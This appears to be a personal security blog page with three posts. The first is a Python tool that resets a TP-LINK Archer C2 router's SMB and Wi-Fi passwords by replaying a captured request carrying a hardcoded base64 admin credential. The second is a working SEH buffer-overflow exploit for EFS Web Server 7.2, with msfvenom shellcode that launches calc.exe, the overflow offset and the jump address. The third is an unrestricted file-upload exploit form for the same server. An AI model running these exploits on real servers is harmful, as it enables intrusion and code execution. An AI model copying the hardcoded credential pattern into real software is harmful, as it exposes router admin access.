[Project] Small temporarily office network Part 3

[Tool] Change TP-LINK AC750 SMB User Password Without login to Admin page

This project is based on my previous project [Project] Small temporarily office network Part 2
I spent some time creating this tool, which lets normal non-technical users just run the program and change the SMB user password easily.

First I had to analyse the login process, etc.

This is what I got from Wireshark: the router uses a cookie as the authorization identity.
# YWRtaW46YWRtaW42MjM0IQ== –> admin:admin6234!
# the router checks the cookie value to authenticate :/ and “admin6234!” is my pre-set password

ac750

Converting my Python script into an .exe executable file

1. Download https://bootstrap.pypa.io/get-pip.py and run it; it will install pip for you.
2. install pyinstaller   ---> open cmd and type:  pip install pyinstaller
3. change to pyinstaller folder   ---> cd C:\Python27\Scripts
4. convert file with custom icon  -> pyinstaller --onefile --icon=my.ico --clean C:\Python27\update.py

Result:


----------------------------------------
[1]. Change Document Password
[2]. Change Audio Password
----------------------------------------



Please Enter Your Choice: 2



Audio new password ==>  h4Mzit2i6u




[*] Connecting to Default Gateway: 192.168.0.1
[*] Successfully Connected..
[*] Request has been sent!

Press close to Exit

🙂



#!/usr/bin/python

##################################
#   2017/6/29  Chako
#
#   Description: allows users to change the router's SMB password
#                without logging in to the router's admin page
#   
#    Router Model: TP-LINK AC750 Wireless Dual Band Gigabit Router
#    Model No. Archer C2
#
##################################
 
 
import socket
import os
import sys
import string
import random

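Host = "192.168.0.1"
Port = 80
PasswordSize = 10
# ASCII-only alphabet. string.letters is locale-dependent on Python 2 and can
# contain non-ASCII characters, which would end up in the generated password.
Chars = string.ascii_letters + string.digits

# Menu choice -> (USER_ACCOUNT index sent to the router, label shown to the user).
# The indices "2" and "3" are the values the original script sent.
ACCOUNTS = {
    "1": ("2", "Document"),
    "2": ("3", "Audio"),
}

# YWRtaW46YWRtaW42MjM0IQ==    <base64> --> admin:admin6234!
# The router authenticates on this cookie value alone, so the admin login is
# embedded here in clear (base64 is not encryption): anyone who can read this
# script or the packed .exe, or who can sniff the plain-HTTP LAN traffic,
# learns the router's admin password. Prompting for it at run time instead of
# shipping it would limit that exposure.
AuthCookie = "Authorization=Basic YWRtaW46YWRtaW42MjM0IQ=="

try:  # Python 2
    _read_line = raw_input
except NameError:  # Python 3
    _read_line = input


def generate_password(size=PasswordSize):
    """Return *size* random characters drawn from Chars.

    Uses random.SystemRandom (the OS entropy source) instead of the default
    Mersenne Twister, which is not designed for generating credentials.
    """
    rng = random.SystemRandom()
    return "".join(rng.choice(Chars) for _ in range(size))


def build_request(account, password):
    """Build the raw HTTP POST that sets the SMB password of *account*.

    account: the router's USER_ACCOUNT index ("2" = Document, "3" = Audio).
    password: the new password to set (printed to the user by the caller).
    Returns the complete request, headers plus body, as a str.
    """
    body = "[USER_ACCOUNT#" + account + ",0,0,0,0,0#0,0,0,0,0,0]0,1\r\n"
    body += "password=" + password + "\r\n"
    # The original appended this terminator at send time; it is part of the
    # bytes the router receives, so it is counted in Content-Length here.
    body += "\r\n\r\n"
    headers = "POST /cgi?2 HTTP/1.1\r\n"
    headers += "Host: " + Host + "\r\n"
    headers += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n"
    headers += "Accept: */*\r\n"
    headers += "Accept-Language: en-US,en;q=0.5\r\n"
    headers += "Accept-Encoding: gzip, deflate\r\n"
    headers += "Referer: http://" + Host + "/mainFrame.htm \r\n"
    headers += "Content-Type: text/plain\r\n"
    # Computed from the body rather than the hard-coded 70 of the original,
    # which did not match the number of bytes actually sent.
    headers += "Content-Length: " + str(len(body)) + "\r\n"
    headers += "Cookie: " + AuthCookie + "\r\n"
    headers += "Connection: keep-alive\r\n\r\n"
    return headers + body


def send_request(request):
    """Connect to Host:Port, send *request* in full and close the socket.

    Exits the process (the original exited with status 0 here; this uses 1
    so a wrapper can tell failure from success) when the gateway cannot be
    reached.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((Host, Port))
    except socket.error:
        sock.close()
        print("[!] " + Host + " didn't respond\n")
        sys.exit(1)
    print("[*] Successfully Connected..")
    try:
        # sendall() retries until every byte is written; send() may stop short.
        sock.sendall(request.encode("ascii"))
        print("[*] Request has been sent!\n")
    finally:
        sock.close()


def main():
    """Show the menu, generate a password for the chosen account and push it to the router."""
    print("\n\n")
    print("----------------------------------------")
    print("[1]. Change Document Password")
    print("[2]. Change Audio Password")
    print("----------------------------------------")
    print("\n\n")

    var = _read_line("Please Enter Your Choice: ")
    print("\n\n")

    if var not in ACCOUNTS:
        # The original fell through and sent a request with an empty account
        # and an empty password for any other input.
        print("[!] Unknown choice: " + var + "\n")
        sys.exit(1)
    account, label = ACCOUNTS[var]
    password = generate_password()
    print(label + " new password ==>  " + password)
    print("\n\n\n")

    print("[*] Connecting to Default Gateway: " + Host)
    send_request(build_request(account, password))

    # raw_input/input shim: the original called Python 2 input(), which
    # evaluates the typed text and raises on an empty line.
    _read_line("Press close to Exit")


if __name__ == "__main__":
    main()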


🙂

—————————————————————————————-

UPDATE: 2017/6/29
Added a function that allows users to change the network connection password.

network_ac750

UPDATE: 2017/6/30
I was trying to use Python + Qt to create a GUI; however, it had some compatibility problems when I tried to convert the .py to .exe, so I ended up rebuilding the whole thing in VB.NET.

Result:
vbupdate



#!/usr/bin/python

#!/usr/bin/python

##################################
#   2017/6/29  Chako
#
#   Description: allows users to change the router's SMB password
#                without logging in to the router's admin page
#   
#    Router Model: TP-LINK AC750 Wireless Dual Band Gigabit Router
#    Model No. Archer C2
#
##################################
 
 
import socket
import os
import sys
import string
import random

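Host = "192.168.0.1"
Port = 80
PasswordSize = 10
# ASCII-only alphabet. string.letters is locale-dependent on Python 2 and can
# contain non-ASCII characters, which would end up in the generated password.
Chars = string.ascii_letters + string.digits

# Menu choice -> (router-side index, label shown to the user).
# USER_ACCOUNT indices "2"/"3" and LAN_WLAN indices "1"/"2" are the values the
# original script sent for each menu entry.
ACCOUNTS = {
    "1": ("2", "Document"),
    "2": ("3", "Audio"),
}
WLANS = {
    "3": ("1", "Network2.4G"),
    "4": ("2", "Network5G"),
}

# YWRtaW46YWRtaW42MjM0IQ==    <base64> --> admin:admin6234!
# The router authenticates on this cookie value alone, so the admin login is
# embedded here in clear (base64 is not encryption): anyone who can read this
# script or the packed .exe, or who can sniff the plain-HTTP LAN traffic,
# learns the router's admin password. Prompting for it at run time instead of
# shipping it would limit that exposure.
AuthCookie = "Authorization=Basic YWRtaW46YWRtaW42MjM0IQ=="

try:  # Python 2
    _read_line = raw_input
except NameError:  # Python 3
    _read_line = input


def generate_password(size=PasswordSize):
    """Return *size* random characters drawn from Chars.

    Uses random.SystemRandom (the OS entropy source) instead of the default
    Mersenne Twister, which is not designed for generating credentials. The
    same generator is used for the Wi-Fi pre-shared key, which is shown on
    screen and must then be typed into every client.
    """
    rng = random.SystemRandom()
    return "".join(rng.choice(Chars) for _ in range(size))


def _http_post(body):
    """Wrap *body* in the POST /cgi?2 request the router expects and return it as a str.

    The header set mirrors the browser request captured with Wireshark;
    Content-Length is computed from *body* rather than hard-coded (the
    original used 70 and 197, neither of which matched the bytes sent).
    """
    headers = "POST /cgi?2 HTTP/1.1\r\n"
    headers += "Host: " + Host + "\r\n"
    headers += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n"
    headers += "Accept: */*\r\n"
    headers += "Accept-Language: en-US,en;q=0.5\r\n"
    headers += "Accept-Encoding: gzip, deflate\r\n"
    headers += "Referer: http://" + Host + "/mainFrame.htm \r\n"
    headers += "Content-Type: text/plain\r\n"
    headers += "Content-Length: " + str(len(body)) + "\r\n"
    headers += "Cookie: " + AuthCookie + "\r\n"
    headers += "Connection: keep-alive\r\n\r\n"
    return headers + body


def build_smb_request(account, password):
    """Build the request that sets the SMB password of USER_ACCOUNT *account* ("2" Document, "3" Audio)."""
    body = "[USER_ACCOUNT#" + account + ",0,0,0,0,0#0,0,0,0,0,0]0,1\r\n"
    body += "password=" + password + "\r\n"
    # The original appended this terminator at send time; it is part of the
    # bytes the router receives, so it is counted in Content-Length.
    return _http_post(body + "\r\n\r\n")


def build_wlan_request(network, password):
    """Build the request that sets the WPA2-PSK key of LAN_WLAN *network* ("1" 2.4G, "2" 5G).

    The BeaconType / IEEE11i* / X_TP_* fields are sent exactly as the
    original script did; they are not validated here.
    """
    body = "[LAN_WLAN#1," + network + ",0,0,0,0#0,0,0,0,0,0]0,5\r\n"
    body += "BeaconType=11i\r\n"
    body += "IEEE11iAuthenticationMode=PSKAuthentication\r\n"
    body += "IEEE11iEncryptionModes=AESEncryption\r\n"
    body += "X_TP_PreSharedKey=" + password + "\r\n"
    body += "X_TP_GroupKeyUpdateInterval=0\r\n"
    return _http_post(body + "\r\n\r\n")


def send_request(request):
    """Connect to Host:Port, send *request* in full and close the socket.

    Exits the process (the original exited with status 0 here; this uses 1
    so a wrapper can tell failure from success) when the gateway cannot be
    reached.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((Host, Port))
    except socket.error:
        sock.close()
        print("[!] " + Host + " didn't respond\n")
        sys.exit(1)
    print("[*] Successfully Connected..")
    try:
        # sendall() retries until every byte is written; send() may stop short.
        sock.sendall(request.encode("ascii"))
        print("[*] Request has been sent!\n")
    finally:
        sock.close()


def main():
    """Show the menu, generate a password for the chosen target and push it to the router."""
    print("\n\n")
    print("----------------------------------------")
    print("[1]. Change Document Password")
    print("[2]. Change Audio Password")
    print("[3]. Change Network Password (Network2.4G)")
    print("[4]. Change Network Password (Network5G)")
    print("----------------------------------------")
    print("\n\n")

    var = _read_line("Please Enter Your Choice: ")
    print("\n\n")

    password = generate_password()
    if var in ACCOUNTS:
        account, label = ACCOUNTS[var]
        print(label + " new password ==>  " + password)
        request = build_smb_request(account, password)
    elif var in WLANS:
        network, label = WLANS[var]
        print("Network (" + label + ") new password ==>  " + password)
        request = build_wlan_request(network, password)
    else:
        # The original reached s.send() with `request` unbound (NameError)
        # for any other input.
        print("[!] Unknown choice: " + var + "\n")
        sys.exit(1)
    print("\n\n\n")

    print("[*] Connecting to Default Gateway: " + Host)
    send_request(request)

    _read_line("Press Close to Exit")
    print("\n\n")


if __name__ == "__main__":
    main()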

EFS Web Server 7.2 – Local Buffer Overflow(SEH)



#!/usr/bin/python

##################################
#   2017/6/17  Chako
#  
#   EFS Web Server 7.2 - Local Buffer Overflow(SEH)
#   Tested on: Windows XP SP3 EN (DEP Off)
#   Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
#
#   Description:
#   Importing a large user account file into EFS Web Server 7.2
#   triggers the vulnerability.
##################################

import struct


# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v Shellcode -f python
# Payload produced by the msfvenom command above: runs calc.exe, encoded with
# x86/alpha_mixed so that, apart from the leading decoder-stub bytes, it is
# made of printable characters and survives being read back from a text file.
Shellcode =  ""
Shellcode += "\x89\xe5\xdb\xd8\xd9\x75\xf4\x5f\x57\x59\x49\x49"
Shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
Shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
Shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
Shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
Shellcode += "\x59\x6c\x59\x78\x4d\x52\x75\x50\x57\x70\x43\x30"
Shellcode += "\x55\x30\x6d\x59\x4b\x55\x55\x61\x6f\x30\x53\x54"
Shellcode += "\x6e\x6b\x56\x30\x30\x30\x6c\x4b\x53\x62\x44\x4c"
Shellcode += "\x6c\x4b\x36\x32\x72\x34\x4e\x6b\x34\x32\x75\x78"
Shellcode += "\x44\x4f\x6d\x67\x50\x4a\x47\x56\x34\x71\x6b\x4f"
Shellcode += "\x6e\x4c\x37\x4c\x31\x71\x53\x4c\x57\x72\x56\x4c"
Shellcode += "\x55\x70\x7a\x61\x48\x4f\x44\x4d\x73\x31\x78\x47"
Shellcode += "\x39\x72\x39\x62\x63\x62\x71\x47\x4e\x6b\x66\x32"
Shellcode += "\x46\x70\x6c\x4b\x51\x5a\x37\x4c\x4c\x4b\x62\x6c"
Shellcode += "\x46\x71\x53\x48\x58\x63\x32\x68\x57\x71\x38\x51"
Shellcode += "\x70\x51\x6e\x6b\x62\x79\x71\x30\x66\x61\x58\x53"
Shellcode += "\x4e\x6b\x57\x39\x34\x58\x39\x73\x67\x4a\x47\x39"
Shellcode += "\x4c\x4b\x50\x34\x4e\x6b\x36\x61\x39\x46\x45\x61"
Shellcode += "\x6b\x4f\x4c\x6c\x6b\x71\x78\x4f\x66\x6d\x56\x61"
Shellcode += "\x6b\x77\x34\x78\x4b\x50\x74\x35\x6b\x46\x37\x73"
Shellcode += "\x33\x4d\x38\x78\x67\x4b\x43\x4d\x67\x54\x43\x45"
Shellcode += "\x59\x74\x63\x68\x4c\x4b\x70\x58\x46\x44\x67\x71"
Shellcode += "\x6b\x63\x72\x46\x6c\x4b\x34\x4c\x52\x6b\x6c\x4b"
Shellcode += "\x33\x68\x37\x6c\x55\x51\x49\x43\x4c\x4b\x55\x54"
Shellcode += "\x4e\x6b\x63\x31\x6a\x70\x6b\x39\x53\x74\x35\x74"
Shellcode += "\x57\x54\x73\x6b\x61\x4b\x53\x51\x50\x59\x33\x6a"
Shellcode += "\x62\x71\x79\x6f\x4d\x30\x51\x4f\x33\x6f\x33\x6a"
Shellcode += "\x6c\x4b\x37\x62\x5a\x4b\x6c\x4d\x31\x4d\x71\x7a"
Shellcode += "\x57\x71\x4e\x6d\x4f\x75\x6c\x72\x43\x30\x77\x70"
Shellcode += "\x73\x30\x50\x50\x42\x48\x56\x51\x4e\x6b\x52\x4f"
Shellcode += "\x4e\x67\x6b\x4f\x68\x55\x4f\x4b\x48\x70\x6f\x45"
Shellcode += "\x6c\x62\x50\x56\x52\x48\x4d\x76\x4a\x35\x4f\x4d"
Shellcode += "\x6d\x4d\x49\x6f\x58\x55\x55\x6c\x33\x36\x61\x6c"
Shellcode += "\x74\x4a\x6b\x30\x69\x6b\x4d\x30\x74\x35\x54\x45"
Shellcode += "\x4d\x6b\x47\x37\x62\x33\x72\x52\x70\x6f\x32\x4a"
Shellcode += "\x63\x30\x56\x33\x59\x6f\x4e\x35\x33\x53\x63\x51"
Shellcode += "\x52\x4c\x33\x53\x44\x6e\x73\x55\x72\x58\x65\x35"
Shellcode += "\x77\x70\x41\x41"




# Filler up to the SEH record. The measured offset recorded in the next comment
# is the root cause in one number: the importer copies the account file into a
# stack buffer with no length check, so 2563 bytes of input reach the exception
# registration record. The vendor fix is a bounds check on that copy.
#SEH record (nseh field) at 0x0012b318 overwritten with normal pattern (offset 2563)
Junk = "\x41" * 2563

# Value that lands in the record's "next" pointer: a 2-byte short jump (EB 0F)
# and two NOPs, skipping the 4-byte handler address that follows.
nSEH = "\xEB\x0F\x90\x90"

# Value that lands in the handler pointer, packed little-endian. The mona-style
# flags below explain why it works: ImageLoad.dll has no SafeSEH table and is
# not ASLR/rebase-enabled, so the address is fixed and the handler is not
# validated. Building the DLL with /SAFESEH and /DYNAMICBASE, enabling SEHOP,
# and running with DEP on (the header notes "DEP Off") each remove one link
# of this chain.
# 0x10012f3b : pop esi # pop ebx # ret  | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = struct.pack("<L", 0x10012f3b)


# Sleds on both sides of the payload.
NOP = "\x90" * 10

# File layout: filler | overwritten SEH record | sled | payload | sled.
BoF = Junk + nSEH + SEH + NOP + Shellcode + NOP


# Report the size and write the payload as the "user account file" referred to
# in the header. The file is opened in text mode: on Windows a 0x0A byte would
# be rewritten as 0x0D 0x0A and shift every offset; no byte above is 0x0A, so
# the written file matches BoF. For detection, note that a genuine account
# file is short and structured, whereas this one is a 2.5 KB run of a single
# byte followed by non-text bytes.
print len(BoF)
f = open ("exploit.txt", "w")
f.write(BoF)
f.close()


import_userefsws

EFS Web Server 7.2 Unrestricted File Upload

##################################
# 2017/6/15 Chako
#
# EFS Web Server 7.2 Unrestricted File Upload
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
##################################

EFS Web Server 7.2 allows unauthorized users to upload malicious files

[Exploit]

// action="http://target_host/disk_c/vfolders
// </script><input size="20" name="upload_author" value="Admin" type="hidden"> 
// you have to know the user name; by default it is "Admin"



<!-- Upload form as captured from EFS Web Server 7.2 (the 192.168.136.129 host
     and the uploadid are from the author's lab capture). The points a reviewer
     should take from it: the only "authentication" the form carries is the
     pair of hidden fields upload_author / upload_passwd, both filled in by
     client-side script from the cookies "UserID" and "PassWD" (see the two
     <script> blocks below) with static fallbacks "Admin" and "829700" left in
     the capture. A password that page script can read out of a cookie is
     exposed to any script on the page, and fields a client fills in cannot be
     trusted server-side; the finding's title ("Unrestricted File Upload")
     indicates the server also does not restrict what is uploaded. A fix has to
     tie the upload to a server-side session and validate file type and
     destination there, not in hidden inputs. -->
<form action="http://192.168.136.129/disk_c/vfolders" name="post" onsubmit="return input(this)" enctype="multipart/form-data" method="post">
<input name="uploadid" id="uploadid" value="34533689" type="hidden">
          <center>
            <a name="reply"></a> 
            <table class="forumline" cellpadding="6" width="479">
              <tbody><tr bgcolor="#8080A6"> 
                <td bgcolor="#eff2f8" height="319"> 
                  <center>

<!-- Author and password come from cookies readable by page script; the static
     inputs after each script are what the capture contained. -->
<script language="JavaScript">
<!--
document.write('<input type="hidden" size="20" name="upload_author" Value="'+ReadCookie("UserID")+'">');
// -->
</script><input size="20" name="upload_author" value="Admin" type="hidden"> 
<script language="JavaScript">
<!--
document.write('<input type="hidden" size="20" name="upload_passwd" Value="'+ReadCookie("PassWD")+'">');
// --></script><input size="20" name="upload_passwd" value="829700" type="hidden"> 

                    <table cellpadding="0" border="0" width="437">
                      <tbody><tr> 
                        <td colspan="2" height="63"> <span class="bgen">Description:</span> <br> 
                          <input name="upload_title" id="upload_title" size="50" value="dd" type="text">
                          </td>
                      </tr>
                      <tr> 
                        <td colspan="2"><span class="bgen">File:</span> <br>
                          <!-- No accept= restriction here, and per the finding none is enforced server-side. -->
                          <input name="UploadedFile" id="UploadedFile" size="50" type="file">
                          <br> </td>
                      </tr>
                      <tr>
</tr>
<tr>
 
                        <td colspan="2" height="40"><font size="2" face="Arial, Helvetica, sans-serif" color="#FFFFFF"> 
                          <input name="Upload" class="button" value="Upload" type="submit">
                          </font> 

                      </td>
                      </tr>
                    </tbody></table>
                  </center></td>
              </tr>
            </tbody></table>
            
          </center>
        </form> 
		[/Exploit]